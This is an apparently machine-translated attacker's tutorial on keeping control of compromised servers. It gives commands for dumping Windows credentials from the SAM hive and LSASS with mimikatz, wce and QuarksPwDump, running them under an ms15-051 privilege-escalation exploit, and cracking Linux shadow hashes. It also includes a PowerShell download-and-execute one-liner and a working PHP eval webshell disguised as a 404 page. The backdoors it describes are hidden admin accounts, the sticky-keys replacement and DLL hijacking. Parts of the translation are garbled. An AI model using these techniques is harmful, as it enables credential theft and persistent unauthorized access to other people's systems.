Intranet penetration – permission maintenance (get windows, linux passwords, install backdoor)

Introduced

When an attacker acquires server permissions, he or she usually uses some backdoor technology to maintain the permissions he currently gets, and once the server is implanted in the back door, it is much easier for the attacker to enter the next time

Objective

Since the attack may be discovered, it may be previously obtained to remove the webshell after discovery, resulting in the loss of the target, so it is necessary to leave a back door to maintain permission for the purpose of continuous control

Get the system login account password

windows Get system login account password

Windows system account password storage location:

C:\Windows\System32\config\SAM

Windows password verification principle: In Windows system, the security management of user accounts using the SAM (Security Account Manager, Secure Account Management) mechanism, the user account and password after Hash encryption, are stored in the SAM database. THE SAM DATABASE IS STORED IN THE C: WINDOWS SYSTEM32-CONFIG-SAM FILE, WHEN THE USER LOGS INTO THE SYSTEM, IT IS NECESSARY TO FIRST COMPARE WITH THE ACCOUNT INFORMATION STORED IN THE SAM FILE, AND VERIFY THAT THE USER CAN LOG IN. The system provides a protection mechanism for SAM files, which cannot be copied or deleted, nor can they be read directly.

Sam file encryption: 1.LM encryption: Before Windows 2003, including Win2003 System 2.NTLM Encryption: Systems LM and NTLM after Windows 2003 are based on Hash encryption, but their security mechanism and security strength vary, and the security of LM password hash is relatively poor. Although few people have used older versions of Windows 2k’ systems, in order to maintain backward compatibility, by default, user passwords are encrypted separately and stored in the SAM database. ces: LM encryption, password up to 14 bits, if the password is less than 14 bits, the insufficient part with 0 complement, all the characters into capital, and then divided into two groups, each group of 7 bits, encryption, and then stitched together, is the final LM hash, the essence is DES encryption. NTLM encryption, first the user password into unicode encoding, and then the standard MD4 one-way hash encryption. LM encryption security is much lower than NTLM encryption because NTLM encryption allows for longer passwords, allows for case differences, and eliminates the need to split passwords into smaller, more easily cracked blocks. So in a pure NTLM environment, you should turn off Lan Manager encryption

Get the contents of the SAM file:

Get sam password method 1. Non-killing tool: wce.exe, QuarksPwDump.exe, Pwdump7.exe, gethash.exe, mimikatz 2.Kill-Free Edition: 2.1 Export hash using registry: command

 reg save hklm\sam C:\hash\sam.hive
 reg save hklm\system C:\hash\system.hive

Then download the exported files, use Pwdump7 to crack 2.2 export sam file shadow copy (generally used in domain control of tens of thousands of users) 2.3 other ways procdump (or lsadump) and mimikatz Powershell mimikatz powershell sgetpasshash powershell smh.com.au

Cracking passwords 

1. Online Hacking http://www.objectif-securite.ch/en/ophcrack.php http://cmd5.com https://somd5.com

2.Local Hacking (Violent Hacking) LM Encryption: Cain NTLM Encryption: ophcrack and Rainbow Table (Rainbow Table Download: http://ophcrack.source.net/tables.php)

Precautions 

1. LM can only store password hash less than or equal to 14 characters, if the password is greater than 14 bits, windows will automatically use NTLM to encrypt it, only the corresponding NTLM hash is available, in the LM-Password will be displayed in full 0. 

2. In general, the hash exported using tools has corresponding LM and NTLM values, that is, this password bit of s.lt;s14, then LM will also have a value, in addition to the LM value is all 0, see LM in the old version: aad3b435b51404ead3b43335 B51404ee at the beginning of the display of the representation password is empty or more than 14 digits

3. Before win2K3 including win2K3 will be the default enable LM encryption, win2K3 after the system disabled LM encryption, encryption using NTLM

4.LM will have a corresponding NTLM hash value

QuarksPwDump.exe

1.QuarksPwDump.exe export local hash value, upload QuarksPwDump.exe to target machine C:

2. Use ms15-051×64.exe (exp) to advance the successful rear kitchen knife virtual terminal input command:

C:\Windows\Temp\ms15-051x64.exe "C:\Windows\Temp\QuarksPwDump.exe --dump-hash-local"

3.AFFFEBA176210FAD4628F0524BFE1942 is the password, and then get cmd5 to crack it

mimikatz

Note: Only the password of the logged-in user can be crawled

The principle of using mimikatz to crawl accounts in clear text hashing

Get password information directly from the lsass.exe process for cracking, and the crack should not be a poor way, but a reverse calculation of lsass.exe directly according to the algorithm lsass.exe is a system process for local security authentication services

1. Use the kitchen knife to upload mimikatz to the target machine C:

2. Use ms15-051×64.exe (exp) to advance the successful rear kitchen knife virtual terminal input command:

C:\Windows\Temp\ms15-051x64.exe "C:\Windows\Temp\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit"

wce.exe

1. Upload wce.exe to target machine C: under Windows and Temp

2. Target machine input

wce.exe -l List passwords and credentials

wce.exe -lv read the password of the sam file

powershell script

Windows comes with a command line that acts as a reinforced command line and extends many scripts, most of which are available for windows and linux commands

Extending the Invoke-WCMDump script gets the hash value (Powershell script for exporting Windows credentials from Credential Manager)

1. Upload script to use

Modifying the policy to a loadable script

Set-ExecutionPolicy unrestricted

Load Invoke-WCMDump script

Import-Module .\Invoke-WCMDump.ps1

Then enter the script name Ivoke-WCMDump run directly

2. Do not upload scripts to use

Remote online access directly using the command line (address is accessible script download address)

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.106/Invoke-WCMDump.ps1');Invoke-WCMDump"

Lazagne

LaZagne is an open source application for retrieving large amounts of passwords stored on local computers. Because each software stores passwords in different ways (clear text, APIs, custom algorithms, databases, etc.), the tool uses a variety of methods to obtain software passwords

1.cmd inputzaglane.exe -h view instructions

2. Extract the hash value (all write specific modules to extract the specified module)

lazagne.exe all

linux, unix access system login account password

System account password storage location:

Password: /etc/shadow account:/etc/passwd

/etc/example:root: $6$Rw99zZ2B$AZwfboPWM6z2tiBeK.EL74sivucCa8YhCrGCBoVdeYUUGsf8iwNx.wTLDjI5poygaGadAWt/gewQKO7jT/:17564:0:999:7:7:7:7:7

Password for: Split Part II: $6$Rw99zZ2B$AZwfboPW6z2tiBeK.EL74sivucCa8YhCrXGCBoVdeDEYUYUGsf8iwNxJkr.wTLDjI5poygaLaCalWtWW/GewQ kO7jT/

First $ is encryption, the second $ is salt value, the third $ is the encrypted password When the first $1, using md5 encryption, the first $ is 5, encryption with SHA256, the first $ is 6, using SHA512 encryption

Cracking passwords: Using John the ripper:

1. Crack directly with the default dictionary

Enter directly on the command line

john --single /etc/shadow

Then enter cat .john/john.pot to view your password

2. Specify your own dictionary crack

Create a new dictionary and write a password

Enter the following code:

john --wordlist list /etc/shadow

Install the back door

Objective

After acquiring server permissions, an attacker usually uses some backdoor technology to maintain server permissions, and once the server is implanted in a backdoor, the attacker is in no man’s land.

Common backdoor technology

Hidden, clone accounts, hidden webshell, shift backdoor, startup items, planning tasks, DLL hijacking technology, Powershell backdoor, remote control software

Here’s how to describe a few of these

1. Hidden, cloned account

Principle

When you create a user, add $at the end and the user becomes a hidden user

Process: Create a $ending user za$, and when you look at the user, you find that there is no user

Add za$users to an administrator group

Za$users can then log in when they log in, and za$users have administrator rights

2. Use 404 pages to hide webshell (use 403 can also, the same principle)

First copy down the source code for page 404 errors.

Then create a new 1.php file in the website directory, write the source code above, /1212 change to our own new file name, and add a word Trojan horse below

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /1.php was not found on this server.</p>
</body></html>
<?php @eval($_REQUEST[666])?>

Accessing 1.php creates the illusion that there is no file

Then connect with a kitchen knife.

3. Windows Shift Backdoor

Principle:

Use cmd.exe to rename and override the original adhesion keys. When we trigger the adhesion key again, it’s the equivalent of running cmd.exe

sethc.exe location:

Windows/System32/sethc.exe

Process:

Rename cmd.exe and replace the shift (sethc.exe) function so that after logging into the server via remote desktop, you can press shift 5 times to pop up the cmd command line with the right to system.

4.DLL Hijacking Right

Examples of the DLL hijacking principle:

For example, if you install a cool dog player, and the cool dog player must call the Next Standard Dynamic Link Library mp3play.dll of Windows system when playing music, then the hacker develops a malicious mp3play.dll, then finds an MP3 song, puts the malicious DLL and song under the same folder, and then packs it to the victim.

If the victim uses the right button to extract the MP3 file in this compression package and the DLL file into a directory (90% of the people will do so), then when the victim clicks on this MP3 file, the cool dog will first look for mp3play.dll to load, and Microsoft designed the loading dll order is first from the default file itself to find the directory, so the false, malicious mp3play.dll is loaded first.